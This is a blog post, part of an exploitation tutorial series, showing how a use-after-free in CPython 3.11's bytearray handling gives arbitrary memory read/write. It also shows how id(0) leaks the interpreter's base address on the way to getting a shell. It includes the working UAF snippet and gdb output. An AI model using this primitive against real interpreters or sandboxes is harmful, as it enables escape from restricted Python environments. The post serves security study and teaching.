<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />


  <script type="text/javascript" id="MathJax-script" async
    src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js">
  </script>
<script type="text/javascript">
window.MathJax = {
  tex: {
    inlineMath: [['$', '$'], ['\\(', '\\)']],
    displayMath: [['$$', '$$'], ['\\[', '\\]']]
  },
  chtml: {
    scale: 1.10   /* Increase font size: 1.0 = default, 1.5 = 150% */
  }
};
</script>
  <title>python pwn</title><!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v3.10.0" />
<meta property="og:title" content="python pwn" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="recommended listening for this post is yeule’s eko" />
<meta property="og:description" content="recommended listening for this post is yeule’s eko" />
<link rel="canonical" href="http://localhost:4000/2025/10/25/python-pwn.html" />
<meta property="og:url" content="http://localhost:4000/2025/10/25/python-pwn.html" />
<meta property="og:site_name" content="wrenches" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-10-25T03:40:00+08:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="python pwn" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-10-25T03:40:00+08:00","datePublished":"2025-10-25T03:40:00+08:00","description":"recommended listening for this post is yeule’s eko","headline":"python pwn","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2025/10/25/python-pwn.html"},"url":"http://localhost:4000/2025/10/25/python-pwn.html"}</script>
<!-- End Jekyll SEO tag -->
<link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="wrenches" /><link rel="shortcut icon" type="image/x-icon" href="" />
  <link rel="stylesheet" href="/assets/css/main.css" />
  <link rel="stylesheet" href="/assets/css/syntax.css">

</head>
<body a="dark">
    <main class="page-content" aria-label="Content">
      <div class="w">
        <a href="/"></a><article>
  <p class="post-meta">
    <time datetime="2025-10-25 03:40:00 +0800">2025-10-25 03:40:00 +0800</time>
  </p>
  
  <h1>python pwn</h1>

  <p>recommended listening for this post is <a href="https://www.youtube.com/watch?v=NiV5d6-GKJ4">yeule’s eko</a></p>

<p><img src="/assets/images/560734.png" alt="alt text" />
in the last post i went over (in excruciating, unasked-for detail) the internals behind a basic uaf vuln in python, and how it creates a buffer w/ a nullptr as its <code class="language-plaintext highlighter-rouge">ob_start</code> and a size that is Extremely Large, leading to arbread and arbwrite.</p>

<p>in this post we are going to pwn python by calling a shell with no imports, no nothing at all. just our uaf and a dream.</p>

<h3 id="where-we-left-off">where we left off</h3>

<p>we left off w/ the following code:</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">class</span> <span class="nc">B</span><span class="p">:</span>
    <span class="k">def</span> <span class="nf">__index__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">global</span> <span class="n">memory</span>
        <span class="n">uaf</span><span class="p">.</span><span class="n">clear</span><span class="p">()</span>
        <span class="n">memory</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">()</span>
        <span class="n">uaf</span><span class="p">.</span><span class="n">extend</span><span class="p">([</span><span class="mi">0</span><span class="p">]</span> <span class="o">*</span> <span class="mi">56</span><span class="p">)</span>
        <span class="k">return</span> <span class="mi">1</span>

<span class="n">uaf</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">(</span><span class="mi">56</span><span class="p">)</span>
<span class="n">uaf</span><span class="p">[</span><span class="mi">23</span><span class="p">]</span> <span class="o">=</span> <span class="n">B</span><span class="p">()</span>
</code></pre></div></div>

<p>i wont go over the details, read the other post for that. essentially what this does is it gives us a <em>memory</em> array we can read + write from, where the entire binary’s virtual memory is mapped into this list.</p>

<p>this is a very powerful primitive obvi, and in an actual C based binary, we would leverage this primitive by looking up common www2exec strats. the principles actually <em>do</em> hold here. for example, we could certainly override, say, exit handlers, or just perform FSOP. it’s definitely feasible - see also <a href="https://github.com/nobodyisnobody/docs/tree/main/code.execution.on.last.libc/">pwn bible</a> for more info on this</p>

<p>but first of all we need to get our leaks! how do we get our leaks?</p>

<p>we’d specifically need a PIE leak, then a libc leak, and both of these are surprisingly nontrivial to get. note that in an actual standard python binary that comes installed in most systems, you do <em>not</em> have PIE. but since i compiled mine from source w debug symbols, i do, and this is something i have to take into account.</p>

<p>(also i hope if you’re reading this, you know what PIE is and i don’t need to explain it)</p>

<p>funnily enough the fact that we have arbitrary read/write to literally any memory is kind of overwhelming in terms of thinking of where to leak - sure, you could just sweep the memory address for pointers to libc and subtract offsets, but you wont know if this actually properly <em>works</em> on various different runs</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="o">-</span><span class="p">(</span><span class="n">navi</span><span class="err">'</span><span class="n">s</span> <span class="n">curette</span><span class="p">)</span><span class="o">-</span><span class="p">[</span><span class="o">~/</span><span class="n">blog</span><span class="o">-</span><span class="n">rawr</span><span class="o">/</span><span class="n">assets</span><span class="o">/</span><span class="n">code</span><span class="o">-</span><span class="n">src</span><span class="o">/</span><span class="n">python</span><span class="o">-</span><span class="n">pwn</span><span class="p">]</span>
<span class="p">[</span><span class="o">-</span><span class="err">$</span> <span class="n">checksec</span> <span class="o">--</span><span class="n">file</span><span class="o">=</span><span class="n">python3</span><span class="p">.</span><span class="mi">11</span>
<span class="n">RELRO</span>           <span class="n">STACK</span> <span class="n">CANARY</span>      <span class="n">NX</span>            <span class="n">PIE</span>             <span class="n">RPATH</span>      <span class="n">RUNPATH</span>	<span class="n">Symbols</span>		<span class="n">FORTIFY</span>	<span class="n">Fortified</span>	<span class="n">Fortifiable</span>	<span class="kt">FILE</span>
<span class="n">Partial</span> <span class="n">RELRO</span>   <span class="n">No</span> <span class="n">canary</span> <span class="n">found</span>   <span class="n">NX</span> <span class="n">enabled</span>    <span class="n">PIE</span> <span class="n">enabled</span>     <span class="n">No</span> <span class="n">RPATH</span>   <span class="n">No</span> <span class="n">RUNPATH</span>   <span class="mi">14726</span> <span class="n">Symbols</span>	 <span class="n">No</span>	<span class="mi">0</span>		<span class="mi">26</span>		<span class="n">python3</span><span class="p">.</span><span class="mi">11</span>
                                                                                                                                                                                             
<span class="p">[</span><span class="o">-</span><span class="p">(</span><span class="n">navi</span><span class="err">'</span><span class="n">s</span> <span class="n">curette</span><span class="p">)</span><span class="o">-</span><span class="p">[</span><span class="o">~/</span><span class="n">blog</span><span class="o">-</span><span class="n">rawr</span><span class="o">/</span><span class="n">assets</span><span class="o">/</span><span class="n">code</span><span class="o">-</span><span class="n">src</span><span class="o">/</span><span class="n">python</span><span class="o">-</span><span class="n">pwn</span><span class="p">]</span>
<span class="p">[</span><span class="o">-</span><span class="err">$</span> <span class="n">checksec</span> <span class="o">--</span><span class="n">file</span><span class="o">=/</span><span class="n">usr</span><span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">python</span>
<span class="n">RELRO</span>           <span class="n">STACK</span> <span class="n">CANARY</span>      <span class="n">NX</span>            <span class="n">PIE</span>             <span class="n">RPATH</span>      <span class="n">RUNPATH</span>	<span class="n">Symbols</span>		<span class="n">FORTIFY</span>	<span class="n">Fortified</span>	<span class="n">Fortifiable</span>	<span class="kt">FILE</span>
<span class="n">Partial</span> <span class="n">RELRO</span>   <span class="n">Canary</span> <span class="n">found</span>      <span class="n">NX</span> <span class="n">enabled</span>    <span class="n">No</span> <span class="n">PIE</span>          <span class="n">No</span> <span class="n">RPATH</span>   <span class="n">No</span> <span class="n">RUNPATH</span>   <span class="n">No</span> <span class="n">Symbols</span>	 <span class="n">Yes</span>	<span class="mi">15</span>		<span class="mi">40</span>		<span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">python</span>
</code></pre></div></div>

<p>i introduce the first function, <code class="language-plaintext highlighter-rouge">id()</code>, which gives us the <em>address</em> of any python object we pass in:</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&gt;&gt;&gt;</span> <span class="nb">hex</span><span class="p">(</span><span class="nb">id</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span>
<span class="s">'0xa41ab0'</span>
<span class="o">&gt;&gt;&gt;</span> <span class="nb">hex</span><span class="p">(</span><span class="nb">id</span><span class="p">(</span><span class="s">'abcdefgh'</span><span class="p">))</span>
<span class="s">'0x7f28953d67f0'</span>
</code></pre></div></div>

<p>it should be obvious why this is very useful, but keep in mind we would still need an object that lies within the python binary (and <em>not</em> in libc) that does not actually get allocated to the heap, <em>and</em> is a specific offset from the python binary base. AND we need to be able to access this from the python language itself!</p>

<p>i actually didnt know where to look for this, until my good buddy fern just answered my prayers (inshallah)</p>

<p><img src="/assets/images/342888.png" alt="alt text" /></p>

<p>this is, as fern themselves would say, very ‘profound’ and ‘elegant’ and whatnot (at least i think it is ! it’s certainly leagues more elegant than what i was planning to do , as i detailed above there)</p>

<p>ok yes. so <code class="language-plaintext highlighter-rouge">id(0)</code> does in fact give an address that is a <em>fixed</em> offset from our binary base, hence leaking PIE!</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">gef</span><span class="o">&gt;</span> <span class="n">run</span>
<span class="n">Starting</span> <span class="n">program</span><span class="o">:</span> <span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">navi</span><span class="o">/</span><span class="n">blog</span><span class="o">-</span><span class="n">rawr</span><span class="o">/</span><span class="n">assets</span><span class="o">/</span><span class="n">code</span><span class="o">-</span><span class="n">src</span><span class="o">/</span><span class="n">python</span><span class="o">-</span><span class="n">pwn</span><span class="o">/</span><span class="n">python3</span><span class="p">.</span><span class="mi">11</span> 
<span class="p">[</span><span class="n">Thread</span> <span class="n">debugging</span> <span class="n">using</span> <span class="n">libthread_db</span> <span class="n">enabled</span><span class="p">]</span>
<span class="n">Using</span> <span class="n">host</span> <span class="n">libthread_db</span> <span class="n">library</span> <span class="s">"/lib/x86_64-linux-gnu/libthread_db.so.1"</span><span class="p">.</span>
<span class="n">Python</span> <span class="mi">3</span><span class="p">.</span><span class="mi">11</span><span class="p">.</span><span class="mi">7</span> <span class="p">(</span><span class="n">main</span><span class="p">,</span> <span class="n">Oct</span> <span class="mi">19</span> <span class="mi">2025</span><span class="p">,</span> <span class="mi">15</span><span class="o">:</span><span class="mi">15</span><span class="o">:</span><span class="mi">58</span><span class="p">)</span> <span class="p">[</span><span class="n">GCC</span> <span class="mi">14</span><span class="p">.</span><span class="mi">2</span><span class="p">.</span><span class="mi">0</span><span class="p">]</span> <span class="n">on</span> <span class="n">linux</span>
<span class="n">Type</span> <span class="s">"help"</span><span class="p">,</span> <span class="s">"copyright"</span><span class="p">,</span> <span class="s">"credits"</span> <span class="n">or</span> <span class="s">"license"</span> <span class="k">for</span> <span class="n">more</span> <span class="n">information</span><span class="p">.</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">hex</span><span class="p">(</span><span class="n">id</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span>
<span class="err">'</span><span class="mh">0x555555ac2828</span><span class="err">'</span>
</code></pre></div></div>

<p>just for our own edification let’s check what’s actually <em>at</em> this address</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">gef</span><span class="o">&gt;</span> <span class="n">x</span><span class="o">/</span><span class="n">x</span> <span class="mh">0x555555ac2828</span>
<span class="mh">0x555555ac2828</span> <span class="o">&lt;</span><span class="n">_PyRuntime</span><span class="o">+</span><span class="mi">840</span><span class="o">&gt;:</span>	<span class="mh">0x3b9acc53</span>
</code></pre></div></div>

<p>eh.. what? this is a pointer to some field in <code class="language-plaintext highlighter-rouge">_PyRuntime</code>? let’s actually take a quick diversion and inspect the</p>

<h3 id="format-of-_pyruntime">format of _PyRuntime</h3>

<p>this is not relevant to pwning python at all btw skip if you want</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">type</span> <span class="o">=</span> <span class="k">struct</span> <span class="n">pyruntimestate</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">_initialized</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">preinitializing</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">preinitialized</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">core_initialized</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">initialized</span><span class="p">;</span>
    <span class="n">_Py_atomic_address</span> <span class="n">_finalizing</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">pyinterpreters</span> <span class="n">interpreters</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">_xidregistry</span> <span class="n">xidregistry</span><span class="p">;</span>
    <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">main_thread</span><span class="p">;</span>
    <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">exitfuncs</span><span class="p">[</span><span class="mi">32</span><span class="p">])(</span><span class="kt">void</span><span class="p">);</span>
    <span class="kt">int</span> <span class="n">nexitfuncs</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">_ceval_runtime_state</span> <span class="n">ceval</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">_gilstate_runtime_state</span> <span class="n">gilstate</span><span class="p">;</span>
    <span class="n">PyPreConfig</span> <span class="n">preconfig</span><span class="p">;</span>
    <span class="n">Py_OpenCodeHookFunction</span> <span class="n">open_code_hook</span><span class="p">;</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">open_code_userdata</span><span class="p">;</span>
    <span class="n">_Py_AuditHookEntry</span> <span class="o">*</span><span class="n">audit_hook_head</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">_Py_unicode_runtime_ids</span> <span class="n">unicode_ids</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">_Py_global_objects</span> <span class="n">global_objects</span><span class="p">;</span>
    <span class="n">PyInterpreterState</span> <span class="n">_main_interpreter</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>theres q a lot of fields in this struct but just by eyepower we probably want <code class="language-plaintext highlighter-rouge">global_objects</code>, and indeed, we do:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">gef</span><span class="o">&gt;</span> <span class="n">p</span> <span class="o">&amp;</span><span class="n">_PyRuntime</span><span class="o">-&gt;</span><span class="n">global_objects</span>
<span class="err">$</span><span class="mi">15</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">_Py_global_objects</span> <span class="o">*</span><span class="p">)</span> <span class="mh">0x555555ac2788</span> <span class="o">&lt;</span><span class="n">_PyRuntime</span><span class="o">+</span><span class="mi">680</span><span class="o">&gt;</span>
</code></pre></div></div>

<p>the offset is about right yeah</p>

<p>let’s actually print what’s in this global_objects struct:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>

<span class="n">gef</span><span class="o">&gt;</span> <span class="n">ptype</span> <span class="o">&amp;</span><span class="n">_PyRuntime</span><span class="o">-&gt;</span><span class="n">global_objects</span>
<span class="n">type</span> <span class="o">=</span> <span class="k">struct</span> <span class="n">_Py_global_objects</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="p">{</span>
        <span class="n">PyLongObject</span> <span class="n">small_ints</span><span class="p">[</span><span class="mi">262</span><span class="p">];</span>
        <span class="n">PyBytesObject</span> <span class="n">bytes_empty</span><span class="p">;</span>
        <span class="k">struct</span> <span class="p">{...}</span> <span class="n">bytes_characters</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
        <span class="k">struct</span> <span class="n">_Py_global_strings</span> <span class="n">strings</span><span class="p">;</span>
        <span class="n">PyGC_Head</span> <span class="n">_tuple_empty_gc_not_used</span><span class="p">;</span>
        <span class="n">PyTupleObject</span> <span class="n">tuple_empty</span><span class="p">;</span>
    <span class="p">}</span> <span class="n">singletons</span><span class="p">;</span>
<span class="p">}</span> <span class="o">*</span>
</code></pre></div></div>

<p>given we got the id of <code class="language-plaintext highlighter-rouge">0</code>, our ptr is probably just an address to a <code class="language-plaintext highlighter-rouge">PyLongObject</code> and ofc we can dereference it as such</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">gef</span><span class="o">&gt;</span> <span class="n">p</span> <span class="o">*</span><span class="p">(</span><span class="n">PyLongObject</span><span class="o">*</span><span class="p">)</span> <span class="mh">0x555555ac2828</span>
<span class="err">$</span><span class="mi">16</span> <span class="o">=</span> <span class="p">{</span>
  <span class="n">ob_base</span> <span class="o">=</span> <span class="p">{</span>
    <span class="n">ob_base</span> <span class="o">=</span> <span class="p">{</span>
      <span class="n">ob_refcnt</span> <span class="o">=</span> <span class="mh">0x3b9acc53</span><span class="p">,</span>
      <span class="n">ob_type</span> <span class="o">=</span> <span class="mh">0x5555559cbc60</span> <span class="o">&lt;</span><span class="n">PyLong_Type</span><span class="o">&gt;</span>
    <span class="p">},</span>
    <span class="n">ob_size</span> <span class="o">=</span> <span class="mh">0x0</span>
  <span class="p">},</span>
  <span class="n">ob_digit</span> <span class="o">=</span> <span class="p">{</span>
    <span class="p">[</span><span class="mh">0x0</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0</span>
  <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>woohoo yup</p>

<p>anyways the reason this works is because our <code class="language-plaintext highlighter-rouge">_PyRuntime</code> var is defined in our python binary itself. it’s not in the heap, it’s not in libc, it’s not wherever else. so the offsets will always be constant.</p>

<h3 id="back-to-pwning">back to pwning</h3>

<p>now that we are able to leak the address of this object, we can just subtract the offsets as per normal to get our PIE leak. the goal now is to then find addresses to libc after getting our PIE leak, and we can do so by finding entries in the Global Offset Table (GOT). just as a quick refresher: the GOT is where addresses to functions in libc are stored, such as <code class="language-plaintext highlighter-rouge">fgets()</code>, <code class="language-plaintext highlighter-rouge">printf()</code>, and etcetera. in a dynamically linked binary, these libc functions are defined in a separate address space, and the binary does not know where those functions actually are. the addresses get resolved when the binary needs to execute them, after which they are stored in the GOT. <em>meaning</em>, the GOT will have addresses to functions in libc!</p>


</article>
      </div>
    </main>
  </body>
</html>
